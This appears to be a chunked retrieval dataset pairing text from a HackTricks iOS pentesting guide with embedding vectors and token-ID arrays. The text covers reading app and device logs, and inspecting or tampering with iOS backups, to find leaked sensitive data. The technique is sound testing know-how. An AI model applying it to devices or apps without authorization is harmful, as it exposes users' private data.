1020, 1998, 2917, 1010, 15664, 2020 ]
hack_tricks
43.txt
14
world readable ( a malicious app could read logs from other apps and extract sensitive information from there ). nowadays, apps can only access their own logs. however, an attacker with physical access to an unlocked device can connect it to a computer and read the logs ( note that the logs written to disk by an app aren't removed if the app ins uninstalled ). it's recommended to navigate through all the screens of the app and interact with every ui element and functionality of and provide input text in all text fields and review the logs looking for sensitive information exposed. use the following keywords to check the app's source code for predefined and custom logging statements : for predefined and built - in functions : nslognsassertnscassertfprintffor custom functions : logginglogfilemonitoring system logsmany apps log informative ( and potentially sensitive ) messages to the console log. the log also contains crash reports and other useful information. you can use these tools : idevice _ id - - list # to find the device ididevicesyslog - u < id > ( | grep < app > ) # to get the device logsyou can collect console logs through the xcode devices window as follows : 1. launch xcode. 2. connect your device to your host computer. 3. choose window - > devices and simulators. 4. click on your connected ios device in the left section of the devices window. 5. reproduce the problem. 6. click on the open console button located in the upper right - hand area of the devices window to view the console logs on a separate window. you can also connect to the device shell as explained in accessing the device shell, install socat via apt - get and run the following command : iphone : ~ root # socat - unix - connect : / var / run / lockdown / syslog. sock = = = = = = = = = = = = = = = = = = = = = = = = asl is here to serve you > watchokjun 7 13 : 42 : 14 iphone chmod [ 9705 ] < notice > : ms : notice : injecting : ( null ) [ chmod ] ( 1556. 00 ) jun 7 13 : 42 : 14 iphone readlink [ 9706 ] < notice > : ms : notice : injecting : ( null ) [ readlink ] ( 1556. 00 )
[ 0.30964913964271545, 0.06399286538362503, -0.12766461074352264, 0.6334928870201111, 0.23174437880516052, 0.1113928034901619, -0.42671456933021545, 0.5535971522331238, 0.3795982897281647, 1.325986385345459, 0.35278257727622986, 0.15294286608695984, 0.4408271014690399, -1.1294621229171753, -0.590603768825531, -0.3712451159954071, -0.5062410831451416, -0.1868632435798645, -0.1127682477235794, -0.3735240697860718, 0.5782206654548645, 0.5336496829986572, -0.8847680687904358, -0.7474392652511597, -1.2204283475875854, 0.49557217955589294, 0.5414336323738098, -0.22569918632507324, 0.4674983322620392, 1.097509503364563, -0.14836369454860687, -0.11230592429637909, 0.05065207928419113, -1.201656460762024, 0.16683460772037506, -0.18853414058685303, 1.6863248348236084, -0.39610493183135986, -0.12045469135046005, -0.7234103679656982, -0.02188885025680065, 0.05799681693315506, 0.4780226945877075, -0.9772893190383911, -0.427695095539093, -0.7833251357078552, -0.003112519159913063, -0.29330548644065857, 0.646612823009491, 0.4991348385810852, 0.10268314927816391, 0.15251554548740387, 0.07047279924154282, -0.012479482218623161, 0.5385175943374634, 0.0287434384226799, 0.15619730949401855, -0.11690542101860046, -0.2505783140659332, -0.12011554837226868, 0.29403549432754517, 0.5618782043457031, 0.1595500409603119, -0.6612323522567749, -0.15605416893959045, 0.21004241704940796, -0.28513383865356445, 0.015382257290184498, 0.021413125097751617, -0.19614559412002563, 0.027343735098838806, 0.9664226770401001, -0.4853033423423767, -0.2986471652984619, -0.21504728496074677, -0.07144644856452942, -0.16125273704528809, -0.565875232219696, -0.402145117521286, 0.9733601808547974, -0.32264336943626404, 0.44769087433815, 0.39949649572372437, -0.19189399480819702, -0.5157070755958557, -0.20855194330215454, 0.6713414192199707, 0.2914162874221802, -0.7498623132705688, -0.17504559457302094, 0.21332047879695892, 0.04781752824783325, -0.8582375049591064, -0.4951077401638031, 0.7007173299789429, 0.6259018778800964, -0.16166864335536957, -0.11086474359035492, -0.053936783224344254, 0.19978688657283783, 0.6279881000518799, 0.4463270306587219, 0.4540204405784607, 0.8541992902755737, -0.3337157964706421, 0.5103408694267273, 0.9039891362190247, -0.32073161005973816, -0.5996564030647278, -0.5017157793045044, 0.419025719165802, -0.09465198218822479, -0.055020492523908615, -0.7303526997566223, -0.17486783862113953, 0.05042319372296333, 0.4741314649581909, -0.4633435010910034, -0.6797323226928711, 0.35460224747657776, -0.1856415867805481, 0.06341548264026642, 0.4657789468765259, -0.46627146005630493, -0.17256607115268707, 0.25350698828697205, 0.5347972512245178, 0.2037907838821411, -0.5991711616516113, -0.874718189239502, -0.15711666643619537, 0.05084379389882088, -0.25309720635414124, 0.9054141044616699, -0.309838205575943, 0.05480882525444031, 0.2544444799423218, 0.17098955810070038, 0.5216453671455383, -0.7889936566352844, -0.24662983417510986, 0.060037583112716675, 0.020394882187247276, 1.4620075225830078, 0.37108445167541504, -0.08976578712463379, -0.18954569101333618, 0.09472610056400299, -0.01894284226000309, 0.48316746950149536, -0.04733802005648613, 0.34534111618995667, 0.9693616032600403, -0.7613033056259155, -0.3919440507888794, 0.13470101356506348, -0.6698728799819946, 0.910673975944519, -0.09965568780899048, 0.29214078187942505, 0.21775385737419128, 0.617411732673645, -0.18255823850631714, 0.15888771414756775, -0.24416767060756683, 0.6732864379882812, -0.7628887295722961, -0.592538058757782, -0.3445894420146942, 0.402858167886734, 0.031214416027069092, 0.05748835951089859, -0.3811625838279724, 0.15412159264087677, 1.569553017616272, 0.26527461409568787, 0.32362839579582214, -0.13599207997322083, 0.05302000790834427, 0.3128083348274231, -0.39498671889305115, 0.18322888016700745, 0.12063233554363251, 0.618632435798645, -0.11320064216852188, 0.5237556099891663, -0.04917023330926895, -0.5172348618507385, -0.5619392991065979, -0.2963162064552307, -0.24866576492786407, 1.0355406999588013, -0.6202800869941711, 0.16897304356098175, 0.47484642267227173, -0.1611230969429016, -1.1753547191619873, -0.22096587717533112, -0.3420403301715851, -1.109062910079956, -0.2509308159351349, 0.11108043044805527, -0.25495588779449463, 0.6981697082519531, -0.5132089853286743, -0.43720903992652893, 0.9432839751243591, 0.9304097294807434, -0.36998969316482544, 0.40395569801330566, 0.5436184406280518, 0.1685742884874344, -0.6955090165138245, 0.07485498487949371, 0.04157036542892456, 0.14249853789806366, 0.08236182481050491, 0.2698374092578888, -0.015686126425862312, -0.3513176143169403, -0.07466615736484528, 0.34026071429252625, 0.5165761709213257, 0.2288254201412201, 0.05150250345468521, -0.5923401713371277, -0.005487718619406223, -0.14737313985824585, -0.3555451035499573, -0.0099701639264822, -0.3067167401313782, 0.43979376554489136, 0.3605763018131256, 0.7313936352729797, -0.2096225470304489, -0.3786739110946655, 0.3793054223060608, -0.21469755470752716, 0.6898083090782166, 0.013790207915008068, -0.19487516582012177, 0.9493414759635925, 0.006236150860786438, 0.26872336864471436, 0.5822675228118896, -0.15281100571155548, 0.02604997158050537, 0.08571726083755493, 0.47254106402397156, 0.32573896646499634, -0.753598153591156, 0.7737441062927246, 0.8904962539672852, -0.21818922460079193, -0.2724766731262207, -0.06564046442508698, 0.5958326458930969, 0.9154546856880188, -0.5617953538894653, -0.8455731272697449, -0.013981770724058151, -0.3964618742465973, 0.3835262656211853, 0.030300570651888847, -0.06093496084213257, 0.43352073431015015, 0.3466202914714813, 0.2103765904903412, -0.549909234046936, -0.7023753523826599, -0.9689939022064209, -0.3493165969848633, -0.8892917633056641, -0.498464971780777, -0.7370306253433228, 0.44004181027412415, 0.25551411509513855, -0.430290162563324, -0.17695413529872894, -0.6411089897155762, -0.2946402430534363, 0.7445811629295349, 0.12357328832149506, 0.4988468289375305, -0.7692686319351196, -0.0618913434445858, -0.9514194130897522, 0.2031106948852539, 0.44161006808280945, 0.682759165763855, 0.07547132670879364, -0.19015279412269592, -0.6577736139297485, -0.6967213749885559, 0.35499516129493713, -0.4771779775619507, 0.8599222302436829, -0.35972902178764343, -0.09197702258825302, 0.28163862228393555, 0.2616368532180786, -0.3389289975166321, 0.004529627505689859, 0.23488549888134003, -0.6373434662818909, 0.5710850954055786, 0.32363417744636536, -0.2977582812309265, 0.19890573620796204, 0.6277961134910583, -0.3570043742656708, 0.42469677329063416, -0.24427615106105804, 0.1010652408003807, -0.5212981700897217, 0.28533852100372314, 0.46922093629837036, 0.3638271689414978, -0.2893884778022766, -0.5631734132766724, 0.5068216919898987, -0.8288692235946655, -0.5855494141578674, -0.1468455046415329, 0.1300850212574005, 0.327969491481781, 0.24626430869102478, -0.9645014405250549, 0.27459296584129333, -0.4144836962223053, -0.2836751341819763, -0.1448170244693756, -0.026193061843514442, 1.2141879796981812, -0.1464259773492813, 0.137913778424263, -0.7937167882919312, -0.39204591512680054, -0.25572940707206726, 0.8473996520042419, 0.15223470330238342, -0.5395323634147644, 0.21136073768138885, 0.5018334984779358, -0.2619820535182953, 0.612874448299408, 0.03998055309057236, -0.3583041727542877, -0.1082853376865387, -0.2609049677848816, -1.0344756841659546, -0.29251477122306824, 0.32462114095687866, 0.4591079652309418, 0.39994141459465027, 0.7203908562660217, -0.7143620252609253, -0.09743473678827286, 0.5844141244888306, -0.02572200633585453, 0.3981163799762726, -0.21323004364967346, -0.07087838649749756, 0.7046875357627869, -0.15870794653892517, -0.3910757899284363, 0.05781824141740799, 0.06278939545154572, 0.5371915102005005, -0.16789957880973816, 0.4308874011039734, -0.6385093927383423, 0.19439682364463806, 0.4813550114631653, -0.6660347580909729, -1.2408548593521118, 0.456341028213501, -0.3177978992462158, 0.9971811771392822, -0.25273561477661133, 0.5606305003166199, -0.11336950957775116, -0.09485546499490738, 0.1162654384970665, 0.0036220436450093985, -0.29335343837738037, -0.8627881407737732, -0.6943594217300415, -0.08386121690273285, -0.037358880043029785, 0.3280903398990631, -0.23640546202659607, 0.11793574690818787, -0.2361837476491928, -0.987879753112793, -1.1685256958007812, 0.8825882077217102, 0.6178761124610901, 0.5900800228118896, 0.3985646665096283, 0.8775579929351807, 0.001374338287860155, -0.40463659167289734, 0.29407355189323425, -0.7757376432418823, 0.7994951605796814, -0.35756435990333557, 0.42206740379333496, -0.50101637840271, -0.0036888993345201015, -0.06104613468050957, -0.09436528384685516, -0.6946489214897156, 0.046797048300504684, 0.2123670130968094, 0.14428988099098206, -0.3816598057746887, 0.22525952756404877, 0.40141618251800537, -0.46994709968566895, -0.6364874839782715, 0.13533589243888855, -0.4126644730567932, 0.711493194103241, 0.6306482553482056, -0.7820895910263062, -0.4536820948123932, -0.6332916021347046, 0.5476040244102478, 0.2978948652744293, 0.2630501687526703, -0.6418893337249756, -0.1484651267528534, -0.4013628661632538, -0.582823634147644, 0.2967919409275055, 0.5395680069923401, 0.17139822244644165, -0.035203803330659866, -0.9797834753990173, -0.34140127897262573, 0.8719618320465088, -0.37595707178115845, -0.8970875144004822, 0.14787590503692627, 0.20011581480503082, 0.36437714099884033, 0.42485398054122925, 0.21612770855426788, 0.12087377160787582, -0.11181791126728058, -0.9929302334785461, 0.6582053303718567, -1.1308479309082031, -0.04289199784398079, 0.588758111000061, 0.32382649183273315, -0.5882543921470642, 0.04922731593251228, -1.300138235092163, 0.4568069875240326, -0.27313756942749023, 0.06819472461938858, -0.3664999008178711, -0.42210862040519714, 0.958489716053009, 0.08620477467775345, -0.36071985960006714, 0.4233829379081726, -0.01937258057296276, 0.3333877921104431, -0.04933047667145729, -0.6410717964172363, -0.16357803344726562, 0.3965649902820587, -1.0858968496322632, 0.4144870638847351, -0.11170613765716553, 0.06540247052907944, -0.20530688762664795, -0.6099222302436829, 0.7444469332695007, 0.20863676071166992, 0.25867635011672974, -1.0131131410598755, -0.2897098958492279, 0.2112431824207306, -0.024197375401854515, 0.22381962835788727, 0.4140132665634155, 0.0660022720694542, 0.20885632932186127, -0.42735981941223145, 0.09244026988744736, -0.4166094660758972, 0.027875764295458794, -0.2056114673614502, -0.5265268683433533, 0.4182926118373871, 0.21119415760040283, 0.516302764415741, -0.3117671608924866, -0.3555760383605957, -0.04880409315228462, 0.2828434705734253, 0.14558157324790955, -0.8500473499298096, 0.6730520129203796, -0.35891586542129517, 0.5677717328071594, 0.07149884849786758, 0.19138190150260925, -0.14061689376831055, -0.4446204900741577, -0.03173038735985756, 0.186104416847229, 0.18964436650276184, -0.1858944445848465, -0.5898496508598328, -0.09365054219961166, 0.7001039981842041, -0.38558071851730347, 0.08840655535459518, 0.6260895133018494, -0.39596107602119446, -0.03270097076892853, -0.4181826114654541, -0.3943232297897339, -0.6513189077377319, -0.4322880804538727, 0.5172548890113831, -0.44452965259552, 0.445649653673172, -0.7479573488235474, -0.04159042239189148, 0.011253658682107925, 0.30415990948677063, 0.34859365224838257, -0.8563215136528015, -0.7272925972938538, -0.06798923015594482, 0.0038031700532883406, 0.05827208235859871, -0.4002896249294281, -0.3951052725315094, -0.5395817756652832, -0.8285682201385498, 0.6072924733161926, 0.3255124092102051, -0.17419493198394775, -0.08144865930080414, 0.1329256147146225, 0.5418221950531006, 0.1857030689716339, -1.123187780380249, 0.41017773747444153, -0.37234821915626526, 0.11073365807533264, -0.5434780716896057, 0.912788450717926, -0.11316537857055664, 0.021563319489359856, -0.24234366416931152, -0.3396291732788086, 0.13028870522975922, 0.08621027320623398, -0.21495117247104645, 0.638950765132904, 0.7976328134536743, -0.6657962799072266, 0.0257267989218235, -0.19927775859832764, 0.8795233368873596, 0.4548499584197998, 0.11307517439126968, -0.7757833003997803, -0.36311185359954834, -0.11981021612882614, -1.0048587322235107, 0.4306667745113373, -0.2720429003238678, 0.08453858643770218, 0.21873599290847778, 0.17476646602153778, 0.8283712267875671, -0.5408373475074768, 0.07379210740327835, 0.7963684797286987, 0.31174200773239136, 0.295721173286438, -0.8507683277130127, 0.561297595500946, 0.1666196584701538, -0.43033725023269653, 0.03154076263308525, -0.6354239583015442, 0.1740584522485733, -0.3342631459236145, -0.09940671175718307, -0.3807728588581085, -0.36244675517082214, -0.06523258239030838, 0.22541268169879913, 0.026807459071278572, 0.5774332880973816, 0.4623168706893921, -0.14555415511131287, 0.012465495616197586, -0.007180670741945505, 0.2497461438179016, 0.21589085459709167, 0.8264433145523071, 0.0448458306491375, 0.11158325523138046, 0.26666519045829773, 0.15697140991687775, 0.2894873321056366, -0.42780381441116333, 0.4676933288574219, -0.17424644529819489, -0.5550581812858582, 0.4895486831665039, 0.31095972657203674, -0.8449402451515198, -0.38390249013900757, 0.0004065888933837414, -0.1957390308380127, 0.3485633432865143, -0.5790308117866516, -0.32783043384552, -0.6359798908233643, 0.039519939571619034, 0.18772199749946594, 0.31362152099609375, 0.02186078019440174, 0.5304149985313416, -0.29298099875450134, 0.22682474553585052, -0.8525670170783997, 0.41537103056907654, 0.6087674498558044, -0.7813460230827332, -0.39390668272972107, -0.9863646030426025, 0.3201028108596802, 0.015924084931612015, 0.34114915132522583, 0.7989665269851685, -0.3468623757362366, 0.07314815372228622, 0.4151883125305176, -0.4166218936443329, 0.837746262550354, 0.28920742869377136, 0.3068343997001648, 0.6399330496788025, 0.15029114484786987, -1.1304055452346802, -0.3904211223125458, -0.20499910414218903, 0.09820760041475296, 0.6318273544311523, -0.4295102655887604, 0.16312922537326813, -0.32020941376686096, 0.19216452538967133, -0.25685206055641174, -0.32929280400276184, -0.7972591519355774, -0.5600791573524475, -0.004817142616957426, 0.34405964612960815, 0.40263262391090393, -0.009248931892216206, -0.01898345537483692, -0.014911542646586895, -0.6789515018463135, 0.012729200534522533, 0.718930721282959, -0.36375102400779724, 0.31938615441322327, -0.8754878044128418, 0.5446863174438477, -0.4561097025871277, -0.7315443158149719, -0.6029953956604004, -0.20744366943836212, 0.2325877845287323, -0.568728506565094, -0.4329448342323303, -0.15129251778125763, -0.3325271010398865, 0.3507862985134125, -0.42719337344169617, -0.5600677132606506, -0.16175764799118042, -0.7373927235603333, 0.8857080936431885, 0.4740394055843353, -0.7587820887565613, -0.014392444863915443, -0.3255656659603119, 0.3843940794467926, 0.3059404492378235, -0.6744540333747864, 0.3755406439304352, 0.06579911708831787, -0.10183212906122208, 0.24385112524032593, 0.5779969692230225, 0.06391074508428574, -0.056416939944028854, 0.24724288284778595, -0.630436360836029, -0.11829440295696259, -0.6087238788604736, 0.07470177114009857, -0.20101965963840485, 0.029815614223480225, 0.08051734417676926, 0.7787221670150757, -0.258257120847702, 0.5856960415840149, -1.1912473440170288, 0.3023260533809662, 0.04362022131681442, 0.0029255624394863844, 0.4284127354621887, 0.1576891839504242, 0.04295254498720169, 0.1161704882979393, -0.437518447637558, -0.5231955051422119, 0.020066233351826668, 0.47137656807899475, -0.15484000742435455, -0.10786458849906921, -0.33977237343788147, -0.26113301515579224, 0.09878186136484146, 0.34284064173698425, 0.016771456226706505, 0.06563898175954819, 0.3353557288646698, 0.5941673517227173, -0.8540939688682556, 0.18415860831737518, -0.6913116574287415, -0.12396275997161865, 0.11957237124443054, 0.293289452791214, -0.23588022589683533, 0.11778061091899872, -0.043771468102931976, -0.20169112086296082, 0.1386212557554245, 0.30696454644203186, 0.04978609085083008, -0.12414097040891647, -0.1507074236869812, 1.4352829456329346, -0.42873746156692505, -0.14491350948810577, -0.4616967737674713, 0.8187505006790161, -0.8105578422546387, -0.5136536955833435, 0.3195006251335144, 0.9569175243377686, 0.06771090626716614, -0.27874019742012024, -0.7189267873764038, -0.1765592098236084, 0.3406800329685211, -0.05815914273262024, 0.48078832030296326, -0.10323691368103027, -1.1533554792404175, 0.8766171932220459, -0.34486299753189087, 0.4238011837005615, -0.3743012249469757, -0.2828860580921173, -0.1630219668149948, -0.1549496203660965, -0.7302077412605286, -0.022868575528264046, -0.05443854629993439, 0.008425445295870304, 0.26178768277168274, 0.3187400698661804, 0.6476528644561768, -0.32787981629371643, -0.051741816103458405, -0.5923254489898682, -0.09512736648321152, 0.08406569063663483, -0.09455131739377975, -0.3422750234603882, 0.7773372530937195, 0.4065127372741699, -0.818051815032959, 0.07527172565460205, 0.3795851469039917, -0.2736855447292328, 0.26475366950035095, 0.36678916215896606, -0.8537379503250122, -0.16886615753173828, 0.3419158160686493, -0.3055794835090637, 0.028289128094911575, -0.25467923283576965, -0.24753956496715546, -0.6045904755592346, 0.23183996975421906, 0.5770411491394043, -0.7348700165748596, 0.6230402588844299, 0.14608921110630035, -0.13029222190380096, 0.6901661157608032, 0.10157416015863419, -0.6223495602607727, 0.6235217452049255, 0.9350782632827759, 0.9093673825263977, -0.13742424547672272, 0.45096665620803833, -0.047921761870384216, 0.40094324946403503, -0.03228631243109703, -0.5418196320533752, -0.899245023727417, 0.40027758479118347, 0.2889866232872009, -0.5982823967933655, -0.8222847580909729, -0.07724808901548386, 0.6130926012992859, -0.032559365034103394, 0.6794826984405518, -0.27245938777923584, 0.5960351228713989, -0.648253321647644, 0.23570892214775085, -0.5264705419540405, -0.1672498732805252, 0.11813480406999588, 0.08956123143434525, -0.7068387269973755, 0.6490652561187744, 0.000628405949100852, 0.10182271152734756, 0.233437180519104, 0.6050590872764587, 0.39846116304397583, 0.8775085210800171, 0.2364959567785263, -0.9458085298538208, -0.33121922612190247, -0.02303735725581646, -0.29823046922683716, -0.4605478048324585, -0.1910490244626999, -0.1221100315451622, 1.114152431488037, -0.02324574440717697, -0.7543814778327942, -0.09741181880235672, -0.11594221740961075, 0.13683724403381348, -0.6600279211997986, 0.619101881980896, -0.42404305934906006, 0.026526719331741333, -0.005369334015995264, 0.30396124720573425, -0.0856102854013443, 0.49900925159454346, -0.6117004752159119, -0.012927530333399773, -0.47965994477272034, -0.05129009485244751, -0.3635299801826477, 1.0795633792877197, -0.7358520030975342, -0.03931640833616257, 0.281700074672699, -1.0461857318878174, -0.3499421179294586, -0.19767852127552032, -0.18209172785282135, -0.07417231798171997, 0.5024436116218567, 0.73736572265625, 0.8338181972503662, 0.39637142419815063, -0.09244999289512634, -0.43521252274513245, 0.13698166608810425, 0.6903939247131348, -0.47594109177589417, 1.3146259784698486, 0.19067730009555817, 0.23007182776927948, 0.509810745716095, -0.6740065813064575, 0.24299366772174835, 0.031290069222450256, -0.15467579662799835, 0.1559481918811798, -0.45330557227134705, -0.8050256967544556, -0.42602235078811646, 0.3129691481590271, -0.03257925808429718, 0.12300964444875717, 0.2995798885822296, -0.9741616249084473, -0.00729110324755311, -0.7585906386375427, 0.6303552389144897, -0.41257405281066895, 0.15259593725204468, -0.0041415332816541195, -0.17104792594909668, 0.23074723780155182, -1.165076494216919, 4.376793384552002, 0.7529410719871521, 0.29499515891075134, 0.6113163828849792, 0.19210095703601837, 0.026938118040561676, 1.0257298946380615, -0.2340683490037918, 0.23148831725120544, 0.11391092836856842, 0.1328643411397934, -0.5111151933670044, 0.5129733085632324, 0.805281400680542, 0.45641428232192993, 0.7938960194587708, -0.40127864480018616, 0.1519232988357544, 0.2859438359737396, -0.9499991536140442, -0.8908140063285828, 0.34756413102149963, 0.021807372570037842, 0.7263827919960022, 0.26701658964157104, 0.3511867821216583, 0.7571460008621216, -0.21737578511238098, -0.6107128262519836, -0.6071128249168396, 0.6314274668693542, -0.7193489074707031, 0.3319568932056427, -0.0636405199766159, -0.13117121160030365, 0.38954243063926697, 0.1027933657169342, -0.8484972715377808, -0.5270174145698547, 0.09515541791915894, 0.1642734408378601, -0.141322523355484, 0.049933452159166336, -0.5401240587234497, -0.0580715648829937, 0.6041319966316223, -0.7274856567382812, 0.2850453853607178, 1.344839334487915, -0.6389583349227905, 0.37246018648147583, -0.5600603818893433, 0.6168420314788818, -0.055117636919021606, -0.529564380645752, 0.6875691413879395, -0.03587976470589638, -0.6419786214828491, -0.40737539529800415, 0.17172205448150635, 0.5027328729629517, -0.6759618520736694, 0.07005824893712997, 0.046257928013801575, -0.6544598937034607, 0.35449957847595215, -0.27609729766845703, 0.2643888592720032, 0.21693119406700134, -0.14964276552200317, -0.09801055490970612, 0.019960682839155197, -0.8025736212730408, -0.06620684266090393, 1.0486094951629639, 0.3083312213420868, -0.08003215491771698, 0.17280420660972595, 0.7488089799880981, -0.3249160647392273, -0.2738927900791168, -0.4305504560470581, -0.8669122457504272, 0.4899688959121704, 0.8372641205787659, 0.5879116058349609, 0.03304391726851463, -0.9167479276657104, -0.1730317324399948, 0.12227208912372589, 0.5161277055740356, 0.17947162687778473, 0.1585787534713745, 0.28355857729911804, 0.3283952474594116 ]
[ 2088, 3191, 3085, 1006, 1037, 24391, 10439, 2071, 3191, 15664, 2013, 2060, 18726, 1998, 14817, 7591, 2592, 2013, 2045, 1007, 1012, 13367, 1010, 18726, 2064, 2069, 3229, 2037, 2219, 15664, 1012, 2174, 1010, 2019, 17346, 2007, 3558, 3229, 2000, 2019, 14058, 5080, 2064, 7532, 2009, 2000, 1037, 3274, 1998, 3191, 1996, 15664, 1006, 3602, 2008, 1996, 15664, 2517, 2000, 9785, 2011, 2019, 10439, 4995, 1005, 1056, 3718, 2065, 1996, 10439, 16021, 4895, 7076, 9080, 3709, 1007, 1012, 2009, 1005, 1055, 6749, 2000, 22149, 2083, 2035, 1996, 12117, 1997, 1996, 10439, 1998, 11835, 2007, 2296, 21318, 5783, 1998, 15380, 1997, 1998, 3073, 7953, 3793, 1999, 2035, 3793, 4249, 1998, 3319, 1996, 15664, 2559, 2005, 7591, 2592, 6086, 1012, 2224, 1996, 2206, 3145, 22104, 2000, 4638, 1996, 10439, 1005, 1055, 3120, 3642, 2005, 3653, 3207, 23460, 2094, 1998, 7661, 15899, 8635, 1024, 2005, 3653, 3207, 23460, 2094, 1998, 2328, 1011, 1999, 4972, 1024, 24978, 21197, 3619, 27241, 5339, 3619, 15671, 8043, 24475, 16550, 4246, 2953, 7661, 4972, 1024, 15899, 21197, 8873, 16930, 10698, 29469, 3070, 2291, 15664, 2386, 2100, 18726, 8833, 12367, 8082, 1006, 1998, 9280, 7591, 1007, 7696, 2000, 1996, 10122, 8833, 1012, 1996, 8833, 2036, 3397, 5823, 4311, 1998, 2060, 6179, 2592, 1012, 2017, 2064, 2224, 2122, 5906, 1024, 8909, 17726, 2063, 1035, 8909, 1011, 1011, 2862, 1001, 2000, 2424, 1996, 5080, 8909, 5178, 7903, 2229, 7274, 21197, 1011, 1057, 1026, 8909, 1028, 1006, 1064, 24665, 13699, 1026, 10439, 1028, 1007, 1001, 2000, 2131, 1996, 5080, 15664, 29337, 2064, 8145, 10122, 15664, 2083, 1996, 1060, 16044, 5733, 3332, 2004, 4076, 1024, 1015, 1012, 4888, 1060, 16044, 1012, 1016, 1012, 7532, 2115, 5080, 2000, 2115, 3677, 3274, 1012, 1017, 1012, 5454, 3332, 1011, 1028, 5733, 1998, 25837, 2015, 1012, 1018, 1012, 11562, 2006, 2115, 4198, 16380, 5080, 1999, 1996, 2187, 2930, 1997, 1996, 5733, 3332, 1012, 1019, 1012, 21376, 1996, 3291, 1012, 1020, 1012, 11562, 2006, 1996, 2330, 10122, 6462, 2284, 1999, 1996, 3356, 2157, 1011, 2192, 2181, 1997, 1996, 5733, 3332, 2000, 3193, 1996, 10122, 15664, 2006, 1037, 3584, 3332, 1012, 2017, 2064, 2036, 7532, 2000, 1996, 5080, 5806, 2004, 4541, 1999, 3229, 2075, 1996, 5080, 5806, 1010, 16500, 27084, 4017, 3081, 26794, 1011, 2131, 1998, 2448, 1996, 2206, 3094, 1024, 18059, 1024, 1066, 7117, 1001, 27084, 4017, 1011, 19998, 1011, 7532, 1024, 1013, 13075, 1013, 2448, 1013, 5843, 7698, 1013, 25353, 14540, 8649, 1012, 28407, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 1027, 2004, 2140, 2003, 2182, 2000, 3710, 2017, 1028, 3422, 6559, 19792, 1021, 2410, 1024, 4413, 1024, 2403, 18059, 10381, 5302, 2094, 1031, 5989, 2692, 2629, 1033, 1026, 5060, 1028, 1024, 5796, 1024, 5060, 1024, 1999, 20614, 2075, 1024, 1006, 19701, 1007, 1031, 10381, 5302, 2094, 1033, 1006, 14168, 2575, 1012, 4002, 1007, 12022, 1021, 2410, 1024, 4413, 1024, 2403, 18059, 3191, 13767, 1031, 5989, 2692, 2575, 1033, 1026, 5060, 1028, 1024, 5796, 1024, 5060, 1024, 1999, 20614, 2075, 1024, 1006, 19701, 1007, 1031, 3191, 13767, 1033, 1006, 14168, 2575, 1012, 4002, 1007 ]
hack_tricks
43.txt
15
jun 7 13 : 42 : 14 iphone rm [ 9707 ] < notice > : ms : notice : injecting : ( null ) [ rm ] ( 1556. 00 ) jun 7 13 : 42 : 14 iphone touch [ 9708 ] < notice > : ms : notice : injecting : ( null ) [ touch ] ( 1556. 00 )... use trickest to easily build and automate workflows powered by the world's most advanced community tools. backupsios includes auto - backup features that create copies of the data stored on the device. you can make ios backups from your host computer by using itunes ( till macos catalina ) or finder ( from macos catalina onwards ), or via the icloud backup feature. in both cases, the backup includes nearly all data stored on the ios device except highly sensitive data such as apple pay information and touch id settings. since ios backs up installed apps and their data, an obvious concern is whether sensitive user data stored by the app might unintentionally leak through the backup. another concern, though less obvious, is whether sensitive configuration settings used to protect data or restrict app functionality could be tampered to change app behaviour after restoring a modified backup. both concerns are valid and these vulnerabilities have proven to exist in a vast number of apps today. a backup of a device on which a mobile application has been installed will include all subdirectories ( except for library / caches / ) and files in the app's private directory. therefore, avoid storing sensitive data in plaintext within any of the files or folders that are in the app's private directory or subdirectories. although all the files in documents / and library / application support / are always backed up by default, you can exclude files from the backup by calling nsurl setresourcevalue : forkey : error : with the nsurlisexcludedfrombackupkey key. you can use the nsurlisexcludedfrombackupkey and cfurlisexcludedfrombackupkey file system properties to exclude files and directories from backups. therefore when checking the backup of an application you should check if any sensitive information is accessible and if you can modify any sensitive behaviour of the application by modifying some setting of the backup and restoring the backuphow to teststart by creating a backup of the device ( you can do it using finder ) and
[ 0.29877912998199463, -0.7214108109474182, -0.11433632671833038, 0.36130499839782715, -0.10026009380817413, 0.08286577463150024, 0.44496428966522217, 0.28530022501945496, 0.5534561276435852, 0.8730254173278809, 0.18201619386672974, 0.11839385330677032, 0.18757595121860504, -0.0780813917517662, -0.952401340007782, -0.3045704960823059, -0.08724229037761688, 0.06641823053359985, -0.17651629447937012, -0.48706212639808655, 0.5358924865722656, -0.03649909794330597, -0.9115778207778931, -1.1248987913131714, -0.7329070568084717, 0.7059006690979004, 0.6067349314689636, 0.40636739134788513, 0.4990104138851166, 1.1024624109268188, -0.8555618524551392, 0.8939374089241028, 0.10350987315177917, -0.2842376232147217, -0.008946695365011692, 0.042989581823349, 1.0061063766479492, -0.025003768503665924, 0.12447942793369293, -1.304636836051941, 0.16495637595653534, 0.11314551532268524, 0.5067391395568848, -0.4953879117965698, -0.5706313848495483, -0.11408005654811859, 0.04956079646945, -0.1903349757194519, 0.14898717403411865, 0.11122193187475204, 0.8729488849639893, 0.4890441298484802, 0.07136256247758865, -0.2275688201189041, 0.6424936056137085, 0.19999584555625916, 0.6053094863891602, -0.20704346895217896, -0.3268185257911682, 0.43849262595176697, -0.4461623430252075, 0.1278439313173294, 0.26577726006507874, -0.6936529278755188, 0.09423409402370453, -0.014293897897005081, -0.6508193016052246, -0.29588398337364197, -0.7248377799987793, -0.20244397222995758, 0.0007704248419031501, 0.4249334931373596, -0.15007108449935913, -0.7523947954177856, -0.35654786229133606, 0.2648683786392212, 0.2724763751029968, -0.1934799700975418, 0.12698233127593994, 0.8760223984718323, -0.10692667961120605, 0.6650761961936951, 0.47596269845962524, 0.22986578941345215, -0.5086352229118347, -0.08129256963729858, 0.6448816657066345, -0.11816632747650146, -0.38331663608551025, -0.10572519153356552, 0.3383976221084595, 0.1940055787563324, -0.9297201037406921, 0.07941621541976929, 0.5321329236030579, 0.3022059202194214, -0.11758124828338623, -0.2436029314994812, -0.37248048186302185, -0.12524551153182983, 1.074796199798584, 0.4901537597179413, 0.7044923305511475, 0.7223967909812927, -0.16624952852725983, 0.5775136947631836, 0.5700755715370178, -0.6451398730278015, 0.12755103409290314, -0.36032992601394653, 0.004752020351588726, -0.5043708086013794, 0.5838417410850525, -0.9902957081794739, 0.10824907571077347, -0.032738689333200455, 0.6256937384605408, -0.17518076300621033, -0.534399688243866, 0.5032645463943481, 0.2764815092086792, -0.07755764573812485, 0.6183522343635559, -0.6521788835525513, 0.17526225745677948, 0.3109002411365509, 0.7071698307991028, 0.7506542801856995, -0.8359186053276062, 